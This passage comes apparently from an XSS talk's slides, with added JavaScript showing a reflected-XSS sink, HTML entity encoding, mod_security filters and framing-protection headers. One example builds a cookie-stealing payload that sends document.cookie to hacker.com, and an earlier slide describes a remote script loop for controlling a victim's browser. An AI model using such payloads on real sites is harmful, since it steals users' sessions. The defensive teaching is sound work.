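Base64 expands data by a third, so a 2,000-byte block becomes a 2,668-character parameter before URL encoding; pick the block size against the URL limit of the browsers you expect, not the raw byte count.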
30. Bi-Directional Communication
Send JavaScript commands from the remote server to the client
In a continuous loop, a new “script” tag object is created with the src attribute set to the URL of a remote location. When the remote JavaScript file is updated, it executes within the client's browser.
This side-steps the same-origin policy: a script pulled in by a script tag from any origin runs with the privileges of the page that included it, so it can read data from the originating domain and send it out.
31. Success!
All security models previously mentioned have been circumvented.
With complete control over the user's web browser you can...
Use the doorway to automatically XSS other websites invisibly
Force the user to “hack” the website - download illegal content
Change the URL they are visiting
Anything.
32. Data sanitizing
The answer is to not be vulnerable to XSS.
The best way is to validate your input (query data, post data, cookies, etc).
Developers, do not trust the client and do not use what you don't expect to receive. If at all possible, do not echo user supplied data to the screen.
At the time when untrusted data is used (i.e. printing to screen), substitute the following characters with the equivalent HTML entities. This process renders echoed HTML-laced data as unexecutable by the web browser.
<  &lt;
>  &gt;
"  &quot;
'  &#39;
(  &#40;
)  &#41;
:  &#58;
Encode & as &amp; as well, otherwise entity sequences themselves can be smuggled through, and apply the encoding in the context the data lands in (HTML body, attribute value, JavaScript string): one table does not fit every context.
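The Type 1 attack from slides 15 and 16 beside the fix this slide describes, as an added example that is not code from the talk. The hostnames victim.com and hacker.com follow the slides; the page layout, the `foo.cgi?q=` parameter handling and the cookie-stealing payload are illustrative assumptions, and the entity table is the one given on this slide with & added.

```javascript
// Added example: a reflected ("Direct Echo") XSS sink next to its encoded form.
// Not from the slides; victim.com / hacker.com / foo.cgi are illustrative.

// Vulnerable: the search term is pasted straight into the HTML, so whatever
// is in the q parameter is parsed as markup and runs under victim.com.
function renderSearchVulnerable(query) {
  return `<html><body><h1>Results for: ${query}</h1></body></html>`;
}

// Entity table from the slide. < > " ' are the essential ones; the slide also
// lists ( ) : because they defuse some javascript: and function-call tricks.
const ENTITY_MAP = {
  '<': '&lt;',
  '>': '&gt;',
  '"': '&quot;',
  "'": '&#39;',
  '(': '&#40;',
  ')': '&#41;',
  ':': '&#58;',
};

// Encode untrusted text at the moment it is written into the page.
// & is handled too (an addition to the slide's table) so that an attacker
// cannot pre-build entities that the browser would later decode.
function escapeHtml(text) {
  return String(text).replace(/[&<>"'():]/g, (ch) => (ch === '&' ? '&amp;' : ENTITY_MAP[ch]));
}

// Fixed: identical page, but the untrusted value goes through escapeHtml().
function renderSearchSafe(query) {
  return `<html><body><h1>Results for: ${escapeHtml(query)}</h1></body></html>`;
}

// The attacker's link from slide 15: real hostname, payload in the query string.
// The payload ships document.cookie to hacker.com via an image request.
const PAYLOAD = '<script>new Image().src="http://hacker.com/c?"+document.cookie</script>';
const ATTACK_URL = 'http://victim.com/foo.cgi?q=' + encodeURIComponent(PAYLOAD);

// Server side: extract q exactly as foo.cgi would see it after URL decoding.
function queryFromUrl(url) {
  return new URL(url).searchParams.get('q') || '';
}

// Detection helper: does the rendered page contain a live <script> tag?
function containsScriptTag(html) {
  return /<script[\s>]/i.test(html);
}

const DEMO_QUERY = queryFromUrl(ATTACK_URL);
console.log('vulnerable page runs attacker script:', containsScriptTag(renderSearchVulnerable(DEMO_QUERY)));
console.log('encoded page runs attacker script   :', containsScriptTag(renderSearchSafe(DEMO_QUERY)));
```

Note that encoding ( ) and : also mangles harmless text such as times and parenthetical remarks; most production encoders stop at & < > " ' for HTML body context and rely on separate, context-specific encoders for attributes and script blocks.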
34. Application platform security
Apache - mod_security
http://www.modsecurity.org/
<IfModule mod_security.c>
    # Turn the filtering engine On or Off
    SecFilterEngine On
    # Make sure that URL encoding is valid
    SecFilterCheckURLEncoding On
    # Prevent XSS attacks (HTML/JavaScript injection)
    SecFilter "<(.|\n)+>"
</IfModule>
These SecFilter directives are ModSecurity 1.x syntax (2.x replaced them with SecRule). A blanket pattern on angle brackets is easy to evade with encoding tricks and also blocks legitimate input, so treat it as a backstop, not a replacement for output encoding.
35. Application platform security
Microsoft IIS 6.0
Default .NET configuration is configured to prevent XSS (ASP.NET request validation, on by default, rejects requests containing HTML-like input; it stops many payloads but is no substitute for output encoding)
IIS Lockdown
http://www.microsoft.com/windows2000/en/server/iis/default.asp?url=/windows2000/en/server/iis/htm/core/iierrabt.htm
URL Scan
http://www.microsoft.com/technet/security/tools/urlscan.mspx
(May not be helpful if using IIS 6.0)
SecureIIS
http://www.eeye.com/html/products/secureiis/
36. Frame-Busting code
Add the following JavaScript code to your web pages. This code prevents other web pages from including your web pages within HTML frames. Prevents client-side HTML sniffing.
<SCRIPT language="javascript">
if (top != self) top.location.href = location.href;
</SCRIPT>
Caveat: the script runs inside the framed page, so it only works if the framing page lets it run and does not interfere with the navigation; it is a best-effort measure, not a guarantee.
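The same goal expressed as server-side policy the browser enforces before any script runs, as an added example that is not part of the talk: the X-Frame-Options and Content-Security-Policy frame-ancestors headers, plus a small evaluator of how a browser decides whether a page may be framed. Header semantics follow the published X-Frame-Options and CSP rules; the origins are made up, and ports are ignored for brevity.

```javascript
// Added example: framing policy as response headers, with an evaluator that
// mirrors browser behaviour. Not from the slides; victim.com, hacker.com and
// partner.com are illustrative origins.

// Headers to send with every page that must never be framed.
const FRAME_PROTECTION_HEADERS = {
  'X-Frame-Options': 'DENY',
  'Content-Security-Policy': "frame-ancestors 'none'",
};

// Pull the source list out of a "frame-ancestors ..." directive,
// or return null when the policy has no such directive.
function parseFrameAncestors(csp) {
  for (const directive of csp.split(';')) {
    const parts = directive.trim().split(/\s+/);
    if (parts[0].toLowerCase() === 'frame-ancestors') return parts.slice(1);
  }
  return null;
}

// Does one host-source (https://*.partner.com, partner.com, ...) match the
// top-level document's origin? Ports are ignored here (assumption).
function hostSourceMatches(source, top) {
  let scheme = null;
  let host = source;
  const i = source.indexOf('://');
  if (i >= 0) {
    scheme = source.slice(0, i);
    host = source.slice(i + 3);
  }
  host = host.replace(/\/.*$/, ''); // drop any path component
  if (scheme && `${scheme}:` !== top.protocol) return false;
  // "*.partner.com" matches app.partner.com but not partner.com itself.
  if (host.startsWith('*.')) return top.hostname.endsWith(host.slice(1));
  return host === top.hostname;
}

function matchesAncestorList(sources, pageOrigin, topOrigin) {
  const top = new URL(topOrigin);
  for (const raw of sources) {
    const src = raw.replace(/^'|'$/g, '').toLowerCase();
    if (src === 'none') return false; // 'none' forbids every ancestor
    if (src === 'self') {
      if (pageOrigin.toLowerCase() === topOrigin.toLowerCase()) return true;
      continue;
    }
    if (hostSourceMatches(src, top)) return true;
  }
  return false; // empty list or no match: framing not allowed
}

// May the page at pageOrigin, served with these headers, be embedded by a
// top-level document at topOrigin? When frame-ancestors is present, a
// CSP-aware browser ignores X-Frame-Options altogether.
function mayBeFramed(headers, pageOrigin, topOrigin) {
  const csp = headers['Content-Security-Policy'];
  const ancestors = csp ? parseFrameAncestors(csp) : null;
  if (ancestors) return matchesAncestorList(ancestors, pageOrigin, topOrigin);
  const xfo = (headers['X-Frame-Options'] || '').trim().toUpperCase();
  if (xfo === 'DENY') return false;
  if (xfo === 'SAMEORIGIN') return pageOrigin === topOrigin;
  return true; // no policy at all: any site may frame the page
}

console.log('hacker.com may frame victim.com with protection headers:',
  mayBeFramed(FRAME_PROTECTION_HEADERS, 'https://victim.com', 'http://hacker.com'));
console.log('hacker.com may frame victim.com with no headers:',
  mayBeFramed({}, 'https://victim.com', 'http://hacker.com'));
```

Unlike the script above, these headers are applied by the browser before the framed document executes anything, so a framing page that blocks scripts (for example with the iframe sandbox attribute) or suppresses the top-level navigation cannot get around them.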